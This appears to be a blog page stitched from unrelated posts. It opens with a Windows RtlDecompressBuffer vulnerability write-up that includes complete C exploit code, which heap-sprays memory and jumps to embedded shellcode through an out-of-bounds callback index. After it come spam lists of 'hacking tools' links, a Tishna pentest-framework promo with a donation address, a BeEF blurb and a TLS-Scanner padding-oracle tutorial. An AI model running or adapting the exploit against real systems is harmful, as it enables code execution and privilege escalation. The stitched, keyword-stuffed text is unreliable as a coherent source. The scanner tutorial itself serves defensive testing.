RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
  int result; // eax@4

  if ( algorithm & algorithm != 1 )
  {
    if ( algorithm & 0xF0 )
      result = -1073741217;
    else
      result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
  }
  else
  {
    result = -1073741811;
  }
  return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

• the movzx limits the boundaries to 16bits
• the test ax, ax avoids the algorithm 0
• the cmp ax, 1 avoids the algorithm 1
• the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*
    ntdll!RtlDecompressBuffer() vtable exploit + heap spray
    by @sha0coder

*/

#include 
#include 
#include 

#define KB  1024
#define MB  1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
       "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
       "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
       "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
       "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
       "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
       "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
       "\x45\x81\x3e\x43\x72\x65\x61\x75"
       "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
       "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
       "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
       "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
       "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
       "\x6c\x63\x89\xe2\x52\x52\x53\x53"
       "\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
  printf("%s\n\n", msg);
  exit(1);
}

PUCHAR spray(HANDLE heap) {
  PUCHAR map = 0;

  printf("Spraying ...\n");
  printf("Aproximating to %p\n", landing_ptr);

  while (map < landing_ptr-1*MB) {
    map = HeapAlloc(heap, 0, 1*MB);
  }

  //map = HeapAlloc(heap, 0, 1*MB);

  printf("Aproximated to [%x - %x]\n", map, map+1*MB);


  printf("Landing adddr: %x\n", landing_ptr);
  printf("Offset of landing adddr: %d\n", landing_ptr-map);

  return map;
}

void landing_sigtrap(int num_of_traps) {
  memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
  memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
  FARPROC RtlDecompressBuffer;
  NTSTATUS ntStat;
  HANDLE heap;
  PUCHAR compressed, uncompressed;
  ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

  RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

  heap = GetProcessHeap();

  compressed_sz = estimated_uncompressed_sz = 1*KB;

  compressed = HeapAlloc(heap, 0, compressed_sz);

  uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


  spray(heap);
  copy_shellcode();
  //landing_sigtrap(1*KB);
  printf("Landing ...\n");

  ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

  switch(ntStat) {
    case STATUS_SUCCESS:
      printf("decompression Ok!\n");
      break;

    case STATUS_INVALID_PARAMETER:
      printf("bad compression parameter\n");
      break;


    case STATUS_UNSUPPORTED_COMPRESSION:
      printf("unsuported compression\n");
      break;

    case STATUS_BAD_COMPRESSION_BUFFER:
      printf("Need more uncompressed buffer\n");
      break;

    default:
      printf("weird decompression state\n");
      break;
  }

  printf("end.\n");
}

The attack vector

This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

Related word

• Pentest Tools Framework
• Pentest Tools Port Scanner
• Physical Pentest Tools
• New Hacker Tools
• Hacking Tools Hardware
• Hacking Tools For Windows Free Download
• What Is Hacking Tools
• Hack Tools Download
• Hackrf Tools
• Black Hat Hacker Tools
• Hacker Tools Linux
• Hack Tools Download
• Pentest Tools Alternative
• Pentest Tools Apk
• Tools 4 Hack
• Hacker Hardware Tools
• Hacking Tools Software
• Hack Tools 2019
• Hacking Tools Windows 10
• Hak5 Tools
• Hacker Search Tools

Tishna: An Automated Pentest Framework For Web Servers, Web Applications To Web Security

About Tishna:
   Tishna is complete automated pentest framework for web servers, application layer to web security.

   Tishna was tested on: Kali Linux, Parrot Security OS, Black Arch, Termux, Android Led TV.

Tishna's interface: Tishna has 62 options with full automation and can be use for web security swiss knife.

Tishna's installation: First, boot your Kali Linux or Parrot Security OS up. Then open Terminal and enter these commands

Appeared:

• Cyber Space (Computer Security).
• Terror Security (Computer Security).
• National Cyber Security Services.

Brief Introduction

• Tishna is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.
• It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.
• With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.
• Tishna software can audit, servers and web behaviour.
• Tishna can perform Scanning & Enumeration as much as possible of target.
• It's first step to stop cyber criminals by securing your Servers and Web Application Security.
• Tishna is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.

Developer

• Haroon Awan
• mrharoonawan@gmail.com

Support to the coder
   You can sponsor and support via BTC.
   The bitcoin address: 3BuUYgEgsRuEra4GwqNVLKnDCTjLEDfptu

Download Tishna

Related links

• Hack Tools For Pc
• How To Make Hacking Tools
• Bluetooth Hacking Tools Kali
• Growth Hacker Tools
• Hacking Tools Pc
• Hacking Tools Github
• Physical Pentest Tools
• Pentest Tools For Android
• Pentest Tools Alternative
• Hacker Tool Kit
• Game Hacking
• Computer Hacker
• Hack Website Online Tool
• Hacker Tools Apk Download
• Best Hacking Tools 2020
• Pentest Tools For Mac
• Pentest Tools Website Vulnerability
• Tools Used For Hacking
• Hacking Tools Free Download

BeEF: Browser Exploitation Framework

"BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of XSS browser vulnerabilities. Development has focused on creating a modular structure making new module development a trivial process with the intelligence residing within BeEF. Current modules include the first public Inter-protocol Exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more." read more...


Website: http://www.bindshell.net/tools/beef

Continue reading

1. Hacking Tools And Software
2. Hacker Tools Free Download
3. Hacker Tools Apk Download
4. Hacker
5. Hacking Tools Free Download
6. Hacker Tools Online
7. Hack Tool Apk No Root
8. Hacking Tools For Windows 7
9. Pentest Tools Android
10. Free Pentest Tools For Windows
11. Hacker Tools For Mac
12. Hack Tools For Mac
13. Black Hat Hacker Tools
14. Pentest Tools
15. Game Hacking
16. Hack Tools Mac
17. Pentest Automation Tools
18. Pentest Tools Nmap
19. Hack Tools 2019
20. Hacking Tools Online
21. Pentest Tools Tcp Port Scanner
22. Hack Tools For Ubuntu
23. Hack Apps
24. Kik Hack Tools
25. Pentest Tools Nmap
26. Pentest Tools Bluekeep
27. Top Pentest Tools
28. Black Hat Hacker Tools
29. Pentest Tools Linux

Scanning For Padding Oracles

As you might have heard, we recently got our paper on padding oracle attacks accepted to the USENIX Security Conference. In this paper, we describe and evaluate a scanning methodology with which we found several padding oracle vulnerabilities in devices from various vendors. In total, we found that 1.83% of the Alexa Top 1 Million have padding oracle vulnerabilities.

To test whether a server is vulnerable, we specified different padding oracle vectors which we send to the system under test, using different cipher suites and protocol versions. If the server does not behave identically (on both the TLS and TCP layers), we consider it to be vulnerable to a padding oracle attack, since it is leaking information about the plaintext via behavior differences. Depending on the responses to such padding oracle vectors, one can estimate which implementation is responsible for the vulnerability. We contacted quite a few website owners and tried to cooperate with them, to find out which vendors and TLS stacks are responsible for the identified vulnerabilities. You can find our current disclosure status on this issue on https://github.com/RUB-NDS/TLS-Padding-Oracles.
We are currently in contact with other vendors to fix the remaining vulnerabilities, but the some of the rare (in terms of the number of affected hosts) vulnerabilities are currently not attributed. To fix the remaining vulnerabilities, we ask for your assistance to help get rid of this issue. For this purpose, we integrated a standalone version of our padding oracle evaluation tool into our TLS-Scanner (v.2.7) project. This tool allows you (among other things) to evaluate if a specific server is vulnerable.

When the tool detects a vulnerability, it tries to attribute the vulnerability to a specific vendor or CVE. If we already know of the vulnerability of the server you scanned, the tool will print its details. If the tool does not have a description of the vulnerability in its database, it will ask you to notify us about the vulnerable server, such that we can notify the vendor and get the device fixed. To be clear: the tool never sends any data to us - you have the choice of whether to notify us (and what details to include). There is a chance that the tool's attribution is also mistaken, that is, the tool lists a vendor for your host, but you know for sure that you do not use an implementation by this vendor. Please contact us in such cases as well.

How to use the Tool

First, you need to grab hold of the tool. There are 3 ways to get your hands dirty: pre-compiled, self-compiled or Docker. We provide a pre-compiled version of the tool since the compilation process can get quite messy if you are not familiar with java and maven. You can directly download the resulting project here. However, if you also want to play around with the code, you have to compile everything yourself.

Building the TLS-Scanner

For this, you will need (Git), maven (sudo apt-get install maven), OpenJDK-8  (I can guarantee that this version works, other versions might work as well, have not tested it).

You will need to get TLS-Attacker 2.9 (if you do not already have it):

	git clone https://github.com/RUB-NDS/TLS-Attacker.git
	cd TLS-Attacker
	mvn clean install # package is not enough, you need to install it so TLS-Scanner can use it as a library.

view raw gistfile1.txt hosted with ❤ by GitHub

Now we can clone and install the TLS-Scanner

	cd ..
	git clone https://github.com/RUB-NDS/TLS-Scanner.git
	cd TLS-Scanner
	mvn clean package

view raw gistfile1.txt hosted with ❤ by GitHub

Docker

We also provide a Dockerfile, which lets you run the scanner directly

$ docker build . -t tlsscanner

view raw gistfile1.txt hosted with ❤ by GitHub

Getting Started

If you start the TLS-Scanner you should be greeted by a usage info, similar to the one below:

java -jar TLS-Scanner.jar

view raw gistfile1.txt hosted with ❤ by GitHub

 or

docker run -t tlsscanner

view raw gistfile1.txt hosted with ❤ by GitHub

	Usage: <main class> [options]
	Options:
	-aggressiv
	The level of concurrent handshakes (only applies to some resource
	intensive tests)
	Default: 1
	-config
	This parameter allows you to specify a default TlsConfig
	* -connect
	Who to connect to. Syntax: localhost:4433
	-danger
	Integer value (1 - 10) which specifies how aggressive the Scanner should
	test. Default 10
	Default: 10
	-debug
	Show extra debug output (sets logLevel to DEBUG)
	Default: false
	-h, -help
	Prints usage for all the existing commands.
	-implementation
	If you are interessted in the vulnerability of an implementation rather
	than a specific site
	Default: false
	-noColor
	If you use Windows or don't want colored text.
	Default: false
	-quiet
	No output (sets logLevel to NONE)
	Default: false
	-reportDetail
	How detailed do you want the report to be?
	Default: NORMAL
	Possible Values: [ALL, DETAILED, NORMAL, QUICK]
	-scanDetail
	How detailed do you want to scan?
	Default: NORMAL
	Possible Values: [ALL, DETAILED, NORMAL, QUICK]
	-starttls
	Starttls protocol. Choose from ftp, imap, pop3, smtp.
	Default: NONE
	Possible Values: [NONE, FTP, IMAP, POP3, SMTP]
	-threads
	How many threads should execute Probes
	Default: 1
	-timeout
	The timeout used for the scans in ms (default 1000)
	Default: 1000

view raw gistfile1.txt hosted with ❤ by GitHub

This should give you an overview of the supported command line flags. The only really required one is the -connect flag (similar to OpenSSL and TLS-Attacker), with which you specify which host to scan. The most basic command is therefore:

java -jar TLS-Scanner.jar -connect somehost.de

view raw gistfile1.txt hosted with ❤ by GitHub

Your output may look something like this:

	Scanned in: 204s
	Report for hackmanit.de
	--------------------------------------------------------
	Supported Protocol Versions
	TLS10
	TLS11
	TLS12
	--------------------------------------------------------
	Versions
	SSL 2.0 : false
	SSL 3.0 : false
	TLS 1.0 : true
	TLS 1.1 : true
	TLS 1.2 : true
	TLS 1.3 : false
	TLS 1.3 Draft 14 : false
	TLS 1.3 Draft 15 : false
	TLS 1.3 Draft 16 : false
	TLS 1.3 Draft 17 : false
	TLS 1.3 Draft 18 : false
	TLS 1.3 Draft 19 : false
	TLS 1.3 Draft 20 : false
	TLS 1.3 Draft 21 : false
	TLS 1.3 Draft 22 : false
	TLS 1.3 Draft 23 : false
	TLS 1.3 Draft 24 : false
	TLS 1.3 Draft 25 : false
	TLS 1.3 Draft 26 : false
	TLS 1.3 Draft 27 : false
	TLS 1.3 Draft 28 : false
	--------------------------------------------------------
	Supported Ciphersuites
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
	TLS_RSA_WITH_AES_256_GCM_SHA384
	TLS_RSA_WITH_AES_256_CBC_SHA256
	TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	TLS_RSA_WITH_AES_128_CBC_SHA
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
	TLS_RSA_WITH_AES_128_GCM_SHA256
	TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
	TLS_RSA_WITH_AES_128_CBC_SHA256
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
	--------------------------------------------------------
	Supported in TLS10
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_RSA_WITH_AES_256_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
	TLS_RSA_WITH_AES_128_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
	--------------------------------------------------------
	Supported in TLS11
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_RSA_WITH_AES_256_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
	TLS_RSA_WITH_AES_128_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
	--------------------------------------------------------
	Supported in TLS12
	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_RSA_WITH_AES_256_GCM_SHA384
	TLS_RSA_WITH_AES_256_CBC_SHA256
	TLS_RSA_WITH_AES_256_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
	TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
	TLS_RSA_WITH_AES_128_GCM_SHA256
	TLS_RSA_WITH_AES_128_CBC_SHA256
	TLS_RSA_WITH_AES_128_CBC_SHA
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
	--------------------------------------------------------
	Symmetric Supported
	Null : false
	Export : false
	Anon : false
	DES : false
	SEED : false
	IDEA : false
	RC2 : false
	RC4 : false
	3DES : false
	AES : true
	CAMELLIA : true
	ARIA : false
	CHACHA20 POLY1305 : false
	--------------------------------------------------------
	KeyExchange Supported
	RSA : true
	DH : true
	ECDH : true
	GOST : false
	Kerberos : false
	Plain PSK : false
	PSK RSA : false
	PSK DHE : false
	PSK ECDHE : false
	Fortezza : false
	New Hope : false
	ECMQV : false
	--------------------------------------------------------
	Perfect Forward Secrecy
	Supports PFS : true
	Prefers PFS : true
	Supports Only PFS : false
	--------------------------------------------------------
	Cipher Types Supports
	Stream : false
	Block : true
	AEAD : true
	--------------------------------------------------------
	Ciphersuite General
	Enforces Ciphersuite ordering : true
	--------------------------------------------------------
	Supported Extensions
	SERVER_NAME_INDICATION
	EC_POINT_FORMATS
	HEARTBEAT
	SESSION_TICKET
	RENEGOTIATION_INFO
	--------------------------------------------------------
	Extensions
	Secure Renegotiation : true
	Extended Master Secret : false
	Encrypt Then Mac : false
	Tokenbinding : false
	--------------------------------------------------------
	TLS 1.3 Named Groups
	none
	--------------------------------------------------------
	Supported Named Groups
	SECP256R1
	--------------------------------------------------------
	Supported Compressions
	NULL
	--------------------------------------------------------
	Common Bugs [EXPERIMENTAL]
	Version Intolerant : false
	Ciphersuite Intolerant : false
	Extension Intolerant : false
	CS Length Intolerant (>512 Byte) : false
	Compression Intolerant : false
	ALPN Intolerant : false
	CH Length Intolerant : false
	NamedGroup Intolerant : false
	Empty last Extension Intolerant : false
	SigHashAlgo Intolerant : false
	Big ClientHello Intolerant : false
	2nd Ciphersuite Byte Bug : false
	Ignores offered Ciphersuites : false
	Reflects offered Ciphersuites : false
	Ignores offered NamedGroups : false
	Ignores offered SigHashAlgos : true
	--------------------------------------------------------
	Attack Vulnerabilities
	Padding Oracle : false
	Bleichenbacher : false
	CRIME : false
	Breach : false
	Invalid Curve : false
	Invalid Curve Ephemerals : false
	SSL Poodle : false
	TLS Poodle : false
	CVE-20162107 : false
	Logjam : false
	Sweet 32 : false
	DROWN : false
	Heartbleed : Unknown
	EarlyCcs : false
	--------------------------------------------------------
	Bleichenbacher Details
	CKE_CCS_FIN - No Behavior Difference
	CKE - No Behavior Difference
	CKE_CCS - No Behavior Difference
	CKE_FIN - No Behavior Difference
	--------------------------------------------------------
	PaddingOracle Responsemap
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 - TLS12 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS12 - No Behavior Difference
	--------------------------------------------------------
	RFC
	Checks MAC (AppData) : correct
	Checks MAC (Finished) : correct
	Checks VerifyData : correct
	--------------------------------------------------------
	Certificates
	Fingerprint : 214ee696de3dc367a86c53f08154b1b8725a7992be85a366b7fba38f227bf7f0
	Subject : CN=hackmanit.de
	CommonNames : #311530130603550403130c6861636b6d616e69742e6465
	Valid From : Wed Feb 27 08:51:34 CET 2019
	Valid Till : Tue May 28 09:51:34 CEST 2019
	PublicKey : RSA Public Key [38:68:38:ac:e3:c2:c7:2e:60:d6:0d:dd:35:51:4e:9b:80:5b:fc:83]
	modulus: b2a10f47f793b4fdc487f44a06865f3dc4a49deb14db397f3e1ce575a528ec8a053de24e28c941798f2c66d084132f9c94a8f8693f89e58faf08612f6a95a6d17557ea8ebe4ba78166f02222bc3a2b60f42b67a6e5967ce1b1397fff4a08e3b4d50254309f711b92dfae79a5509aa82b4798c81fdd9f38258fa88f7481c04b76298eb7aa76d0fc465f5d2bcb9901da5e7078eaf5c1b2897b92c8fd18a9e6eab240e8e8b696d42a3f1501cd8404979a8b76c620b4eb0e2e835192e450e896ae7da0a91e04a917b12e4325a649084da873adc2d474fbdd2b14e49171f7ac94e593cb9ae8a92b31275b68fde3e62bc601f7cba81897838b24806a7faec67dafc69d
	public exponent: 10001
	Issuer : C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
	Signature Algorithm : RSA
	Hash Algorithm : SHA256
	ROCA (simple) : false
	Fingerprint : 25847d668eb4f04fdd40b12b6b0740c567da7d024308eb6c2c96fe41d9de218d
	Subject : C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
	CommonNames : #312330210603550403131a4c6574277320456e637279707420417574686f72697479205833
	Valid From : Thu Mar 17 17:40:46 CET 2016
	Valid Till : Wed Mar 17 17:40:46 CET 2021
	PublicKey : RSA Public Key [7e:b7:3a:83:81:d9:d9:c1:42:38:24:7a:ff:51:4a:57:d3:bf:4b:68]
	modulus: 9cd30cf05ae52e47b7725d3783b3686330ead735261925e1bdbe35f170922fb7b84b4105aba99e350858ecb12ac468870ba3e375e4e6f3a76271ba7981601fd7919a9ff3d0786771c8690e9591cffee699e9603c48cc7eca4d7712249d471b5aebb9ec1e37001c9cac7ba705eace4aebbd41e53698b9cbfd6d3c9668df232a42900c867467c87fa59ab8526114133f65e98287cbdbfa0e56f68689f3853f9786afb0dc1aef6b0d95167dc42ba065b299043675806bac4af31b9049782fa2964f2a20252904c674c0d031cd8f31389516baa833b843f1b11fc3307fa27931133d2d36f8e3fcf2336ab93931c5afc48d0d1d641633aafa8429b6d40bc0d87dc393
	public exponent: 10001
	Issuer : O=Digital Signature Trust Co.,CN=DST Root CA X3
	Signature Algorithm : RSA
	Hash Algorithm : SHA256
	ROCA (simple) : false
	--------------------------------------------------------
	Certificate Checks
	Expired Certificates : false
	Not yet Valid Certificates : false
	Weak Hash Algorithms : false
	--------------------------------------------------------
	Session
	Supports Session resumption : true
	Supports Session Tickets : true
	--------------------------------------------------------
	Renegotioation & SCSV
	Clientside Secure : false
	Clientside Insecure : false
	--------------------------------------------------------
	HSTS
	Not supported
	--------------------------------------------------------
	HPKP
	Not supported
	--------------------------------------------------------
	HTTPS Response Header
	Date:Thu, 28 Mar 2019 10:39:00 GMT
	Server:Apache
	Location:https://www.hackmanit.de/
	Content-Length:296
	Keep-Alive:timeout=5, max=100
	Connection:Keep-Alive
	Content-Type:text/html; charset=iso-8859-1
	--------------------------------------------------------
	Nonce
	Random : No Duplicates (wip)
	--------------------------------------------------------
	PublicKey Parameter
	EC PublicKey reuse : false
	DH PublicKey reuse : false
	Uses Common DH Primes : true
	2048-bit MODP from RFC 3526
	Uses Non-Prime Moduli : false
	Uses Nonsafe-Prime Moduli : false
	DH Strength : 2048

view raw gistfile1.txt hosted with ❤ by GitHub

By default, TLS-Scanner will run single-threaded. In such cases the scanning will take a while; just how long it will take depends on your server configuration. The scanner also supports multi-threading, which drastically improves the performance. There are two parameters to play around with, -threads, which controls how many different "probes" are executed in parallel, and -aggressive , which controls how many handshakes can be executed simultaneously. If you want the fastest results the following parameters are usually a good choice:

java -jar TLS-Scanner -connect hackmanit.de -threads 15 -aggressive 100

view raw gistfile1.txt hosted with ❤ by GitHub

But lets get back to the results of the Scanner. Currently the Scanner supports a bunch of well known tests, like supported ciphersuites or protocol versions. These are very similar to what you may be used to from other scanners like ssllabs or testssl.sh.

Padding Oracles

The main advantage of our scanner is the ability to scan for padding oracle vulnerabilities (which is probably why you are reading this post). You will see if you are vulnerable in the "Attack Vulnerabilities" section. For example, when scanning hackmanit.de, the result is false. Good for us! But as you might have seen there is also another section in the scanner report:"PaddingOracle Responsemap"
This section lists the responses of the scanned host for each padding oracle vector, for each cipher suite and protocol version. For hackmanit.de, there is no detected difference in responses, which means hackmanit.de is not vulnerable to the attack:

	PaddingOracle Responsemap
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS10 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS10 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
